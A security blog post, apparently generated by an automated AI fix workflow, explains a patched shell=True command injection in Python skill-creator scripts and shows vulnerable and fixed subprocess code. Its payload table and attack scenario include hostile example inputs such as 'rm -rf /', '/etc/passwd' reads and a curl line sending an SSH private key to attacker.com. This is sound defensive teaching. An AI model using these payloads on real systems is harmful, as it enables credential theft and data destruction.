Back to Blog
critical SEVERITY8 min read

Command Injection via shell=True: How One Flag Opens the Door to OS Takeover

A critical command injection vulnerability (CWE-78) was discovered and patched in the skill-creator pipeline, where Python scripts passed unsanitized user input directly to subprocess calls with `shell=True`, allowing attackers to execute arbitrary operating system commands. This fix closes a dangerous attack vector that could have enabled full system compromise, data exfiltration, and lateral movement within affected environments. Understanding how this vulnerability works — and how to prevent

O
By orbisai0security
May 9, 2026
#security#command-injection#python#subprocess#CWE-78#OWASP#secure-coding

Command Injection via shell=True: How One Flag Opens the Door to OS Takeover

Vulnerability: CWE-78 — OS Command Injection
Severity: 🔴 Critical
Affected Files: run_eval.py, improve_description.py, generate_review.py
Status: ✅ Patched


Introduction

There's a deceptively innocent-looking parameter in Python's subprocess module that has been responsible for countless critical security vulnerabilities: shell=True. When combined with user-supplied input, this single flag can transform a routine script execution into a full operating system takeover.

This post breaks down a recently patched critical vulnerability found in the skill-creator pipeline — a real-world example of how shell=True and unsanitized input create a perfect storm for command injection attacks. Whether you're a seasoned backend engineer or a developer just getting started with Python scripting, understanding this class of vulnerability is non-negotiable in today's threat landscape.


The Vulnerability Explained

What Is Command Injection?

OS Command Injection (CWE-78) occurs when an application passes user-controlled data to a system shell without proper sanitization. The shell — whether bash, sh, cmd.exe, or others — interprets special characters as control operators, not as literal data. This means an attacker can "break out" of the intended command and inject their own.

In Python, the danger zone looks like this:

# ❌ VULNERABLE: shell=True with user input
import subprocess

user_input = request.args.get("skill_name")
subprocess.Popen(f"run_eval --skill {user_input}", shell=True)

When shell=True is set, Python hands the entire string to the operating system shell for interpretation. The shell doesn't know or care which parts were "intended" by the developer — it processes everything according to its own syntax rules.

How Does the Shell Interpret Special Characters?

The OS shell recognizes a variety of characters as command operators:

Character Shell Meaning Example Attack
; Command separator skill; rm -rf /
\| Pipe output to next command skill \| curl attacker.com
&& Run next if previous succeeds skill && cat /etc/passwd
\|\| Run next if previous fails skill \|\| whoami
` Command substitution skill`id`
$() Command substitution skill$(cat ~/.ssh/id_rsa)
> Redirect output skill > /tmp/backdoor.sh

The Vulnerable Code Pattern

In the skill-creator pipeline, three scripts were identified as invoking subprocess.Popen or subprocess.run with shell=True while incorporating user-supplied CLI arguments directly into the command string:

# ❌ VULNERABLE pattern (simplified illustration)
import subprocess
import sys

skill_path = sys.argv[1]  # User-controlled input from CLI argument

# The entire string is passed to the shell — shell=True is the culprit
result = subprocess.Popen(
    f"python evaluate.py --input {skill_path}",
    shell=True,
    stdout=subprocess.PIPE
)

This pattern appeared across:
- resources/skills/skill-creator/scripts/run_eval.py (line 85)
- resources/skills/skill-creator/scripts/improve_description.py
- resources/skills/skill-creator/eval-viewer/generate_review.py

A Concrete Attack Scenario

Let's make this tangible. Imagine a developer runs the skill evaluation pipeline and the skill_path argument is sourced from an external input — a config file, an API response, a web form, or even a crafted filename:

Normal input:

/home/user/skills/my_skill

Malicious input:

/home/user/skills/my_skill; curl -s https://attacker.com/exfil?data=$(cat ~/.ssh/id_rsa | base64) &

The shell now executes two commands:
1. python evaluate.py --input /home/user/skills/my_skill ← intended
2. curl -s https://attacker.com/exfil?data=<base64-encoded SSH private key> ← injected

In a CI/CD pipeline or automated evaluation environment, this could lead to:

  • 🔑 Credential theft — SSH keys, API tokens, environment variables
  • 🗂️ Data exfiltration — source code, model weights, proprietary datasets
  • 🚪 Backdoor installation — persistent access via reverse shells
  • 💣 Destructive actions — file deletion, service disruption
  • 🌐 Lateral movement — pivoting to other systems on the network

The impact is classified as Critical because successful exploitation grants the attacker the same OS-level privileges as the process running the script — with no authentication required beyond the ability to influence the input.


The Fix

The Core Principle: Never Use shell=True with User Input

The fix involves two complementary changes:

  1. Remove shell=True — pass commands as a list instead of a string
  2. Validate and sanitize inputs — never trust external data

Before vs. After

❌ Before (Vulnerable):

import subprocess
import sys

skill_path = sys.argv[1]

# shell=True interprets the entire string through the OS shell
result = subprocess.Popen(
    f"python evaluate.py --input {skill_path}",
    shell=True,
    stdout=subprocess.PIPE,
    stderr=subprocess.PIPE
)

✅ After (Fixed):

import subprocess
import sys
import shlex
import os

skill_path = sys.argv[1]

# Validate the input before use
if not os.path.exists(skill_path):
    raise ValueError(f"Invalid skill path: {skill_path}")

# Pass as a list — no shell interpretation, no injection possible
result = subprocess.Popen(
    ["python", "evaluate.py", "--input", skill_path],
    shell=False,  # explicit is better than implicit
    stdout=subprocess.PIPE,
    stderr=subprocess.PIPE
)

Why Does the List Form Prevent Injection?

When you pass a list to subprocess.Popen (without shell=True), Python uses execvp (on Unix) or CreateProcess (on Windows) to launch the process directly. Each list element becomes a discrete argument — the OS never invokes a shell to interpret the string.

This means special characters like ;, |, and $() are passed literally to the target program as part of an argument value. They have no special meaning. The attack surface disappears entirely.

# These are equivalent in intent, but VERY different in security:

# ❌ Shell interprets the string — injection possible
subprocess.run(f"echo {user_input}", shell=True)

# ✅ OS passes arguments directly — injection impossible
subprocess.run(["echo", user_input], shell=False)

When shell=True Is Genuinely Needed

Occasionally, shell features like glob expansion (*.txt), shell built-ins (cd, export), or pipe chaining are legitimately required. In those cases:

import shlex

# shlex.quote() wraps the value in single quotes and escapes internal quotes
safe_input = shlex.quote(user_input)
subprocess.run(f"some_command {safe_input}", shell=True)

However, shlex.quote() should be considered a last resort, not a first line of defense. Eliminating shell=True is always the preferred approach.


Prevention & Best Practices

1. Default to List-Form Subprocess Calls

Make it a team convention: subprocess calls always use list arguments unless there's a documented, reviewed reason to do otherwise.

# Establish this as your team's standard pattern
subprocess.run(["command", "arg1", "arg2", user_input], check=True)

2. Validate Inputs Before Processing

Apply allowlist validation to any input that will be used in a subprocess call:

import re
import os

def validate_skill_path(path: str) -> str:
    """Validate that a skill path is safe to use."""
    # Allowlist: only alphanumerics, hyphens, underscores, slashes, dots
    if not re.match(r'^[a-zA-Z0-9/_\-\.]+$', path):
        raise ValueError(f"Skill path contains invalid characters: {path}")

    # Ensure the path exists and is within the expected directory
    abs_path = os.path.realpath(path)
    allowed_base = os.path.realpath("/app/skills")
    if not abs_path.startswith(allowed_base):
        raise ValueError("Path traversal detected")

    return abs_path

3. Apply the Principle of Least Privilege

Run scripts with the minimum permissions required. A command injection in a low-privilege process is far less damaging than one running as root or with broad cloud IAM permissions.

# Run evaluation scripts as a dedicated, restricted user
sudo -u skill-evaluator python run_eval.py --input "$SKILL_PATH"

4. Use Static Analysis Tools

Integrate security scanners into your CI/CD pipeline to catch these patterns automatically:

  • Bandit — Python-specific security linter; detects shell=True usage (rule B602, B603)
  • Semgrep — Highly customizable static analysis with rules for subprocess injection
  • CodeQL — GitHub's semantic code analysis engine
  • Safety — Checks Python dependencies for known vulnerabilities
# Example: Bandit in GitHub Actions
- name: Run Bandit Security Scan
  run: |
    pip install bandit
    bandit -r . -ll --skip B101 -f json -o bandit-report.json

5. Code Review Checklist

Add these questions to your security-focused code review checklist:

  • [ ] Does this code call subprocess with shell=True?
  • [ ] Does any subprocess argument originate from user input, environment variables, or external data sources?
  • [ ] Is input validated against an allowlist before use?
  • [ ] Does the process run with the minimum required privileges?

6. Relevant Security Standards

This vulnerability maps to well-established security standards:


Conclusion

The shell=True vulnerability pattern is a textbook example of how a single, seemingly convenient parameter can introduce catastrophic security risk. The fix is straightforward — switch from string-based to list-based subprocess calls — but the lesson runs deeper: never trust user input, and always understand the security implications of the APIs you use.

Key takeaways from this vulnerability:

  1. shell=True + user input = command injection. This is one of the most reliable rules in application security.
  2. The fix is simple but the impact of not fixing it is severe — Critical-severity vulnerabilities like this can lead to full system compromise.
  3. Defense in depth matters — Input validation, least privilege, and static analysis together create multiple layers of protection.
  4. Automated scanning catches what code review misses — Integrate tools like Bandit and Semgrep into your pipeline before code ships.

Security vulnerabilities like this one are rarely the result of malicious intent — they're the product of convenience, time pressure, and incomplete understanding of a platform's security model. The best defense is education, tooling, and a culture that treats security as a first-class concern alongside functionality and performance.

Write safe code. Review with security in mind. And when in doubt, check the docs for the security implications of every parameter you set.


This post was generated as part of an automated security fix workflow by OrbisAI Security. The vulnerability was identified by multi-agent AI scanning, patched, and verified through re-scan and LLM code review.

Have a vulnerability you'd like explained? Security education is the first line of defense.

View the Security Fix

Check out the pull request that fixed this vulnerability

View PR #14842

Related Articles

critical

Stack Buffer Overflow in MapScale: How Five Unsafe sprintf Calls Created a Critical Vulnerability

A critical stack-based buffer overflow vulnerability was discovered and patched in `src/mapscale.c`, where five unbounded `sprintf` calls wrote formatted output into fixed-size stack buffers without any bounds checking. An attacker controlling unit text strings could overflow the stack buffer, potentially overwriting the function return address and achieving arbitrary code execution. The fix replaces dangerous `sprintf` calls with their bounds-checked counterparts, eliminating the overflow risk

critical

Heap Buffer Overflows in YAML Parser: How Unchecked memcpy Calls Create Critical Attack Vectors

A critical heap buffer overflow vulnerability was discovered and patched in the YAML parser embedded within an Android VPN application, where five unvalidated `memcpy` calls could allow an attacker to corrupt heap memory by supplying a crafted YAML configuration file. This class of vulnerability is particularly dangerous because it can lead to arbitrary code execution or application crashes in security-sensitive contexts. The fix adds proper bounds validation before each copy operation, eliminat

critical

Critical Buffer Overflow Fixed: When "Safe" Functions Aren't Safe

A critical vulnerability in DeepSkyStackerKernel's StackWalker.cpp was silently replacing bounds-checking string functions with their unsafe counterparts via preprocessor macros, exposing the entire codebase to buffer overflow attacks. This fix removes the dangerous macro definitions that discarded buffer size arguments, restoring the intended memory safety protections across all call sites. Understanding how this subtle macro trick works is essential for any C/C++ developer working with string